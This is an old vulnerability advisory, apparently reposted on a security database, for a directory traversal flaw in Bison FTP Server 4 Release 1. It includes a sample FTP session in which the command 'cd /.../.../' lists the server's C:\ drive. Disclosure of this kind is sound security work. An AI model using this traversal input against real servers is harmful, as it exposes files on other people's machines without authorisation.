Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

2001-05-14T00:00:00
ID SECURITYVULNS:DOC:1608
Type securityvulns
Reporter Securityvulns
Modified 2001-05-14T00:00:00

Description

Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

Topic: Bison FTP Server Directory Traversal Announced: 2001-02-17 Affects: Bison FTP Server version 4 Release 1

DISCLAIMER:


THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS BE CORRECT.

I. Problem Description


Bison FTP Server is an FTP server for Windows 9x/NT. A bug allows any user to change to any directory.

II. Impact


When sending the command "CWD ..." (or "cd ..." in the default UNIX FTP client), the server will go one directory up.

Example:

<snip> 230 User anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /.../.../ 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for /. <directory listing of c:\> ftp> quit 221 Bye.

III. Solution


At this time, no patch is available yet.

IV. Credits


Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be